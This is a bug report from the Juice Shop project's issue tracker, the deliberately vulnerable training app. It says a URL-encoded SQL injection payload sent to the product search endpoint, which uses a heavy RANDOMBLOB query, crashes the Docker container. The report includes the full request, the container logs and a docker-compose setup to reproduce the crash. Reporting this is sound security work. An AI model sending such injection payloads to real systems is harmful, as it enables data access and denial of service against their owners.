### ISSUE TITLE
[🐛] SQL Injection Leads to Application Crash

### ISSUE THREAD

**Issue by l4rm4nd** [juice-shop/juice-shop#2550]
# :bug: Bug report

## Description

By sending the following HTTP request, trying to exploit an SQLi, Juice-Shop running as Docker container will just crash:

````
GET /rest/products/search?q=apple%25%27%20AND%205711%3DLIKE%28CHAR%2865%2C66%2C67%2C68%2C69%2C70%2C71%29%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27fWzd%25%27%3D%27fWzd HTTP/2
Host: juice.example.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://juice.example.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers


````

The container logs do not report anything back:

````
juice-shop  | info: Detected Node.js version v20.17.0 (OK)
juice-shop  | info: Detected OS linux (OK)
juice-shop  | info: Detected CPU x64 (OK)
juice-shop  | info: Configuration default validated (OK)
juice-shop  | info: Entity models 19 of 19 are initialized (OK)
juice-shop  | info: Required file server.js is present (OK)
juice-shop  | info: Required file index.html is present (OK)
juice-shop  | info: Required file main.js is present (OK)
juice-shop  | info: Required file styles.css is present (OK)
juice-shop  | info: Required file runtime.js is present (OK)
juice-shop  | info: Required file vendor.js is present (OK)
juice-shop  | info: Required file polyfills.js is present (OK)
juice-shop  | info: Port 3000 is available (OK)
juice-shop  | info: Domain https://www.alchemy.com/ is reachable (OK)
juice-shop  | info: Chatbot training data botDefaultTrainingData.json validated (OK)
juice-shop  | info: Server listening on port 3000
juice-shop exited with code 0
````

### Is this a regression?

May be related to the following GH issue:

https://github.com/juice-shop/juice-shop/issues/746

## :microscope: Minimal Reproduction

Here the docker compose (run behind Traefik reverse proxy):

````
services:

  juice-shop:
    image: bkimminich/juice-shop:latest
    container_name: juice-shop
    restart: always
    expose:
      - 3000
    networks:
      - insecure
    labels:
      - traefik.enable=true
      - traefik.http.routers.juiceshop.rule=Host(`juice.example.com`)
      - traefik.http.services.juiceshop.loadbalancer.server.port=3000
      - traefik.docker.network=insecure

networks:
  insecure:
    external: true
````

Then just send the HTTP request. No authentication required. Container will just crash.
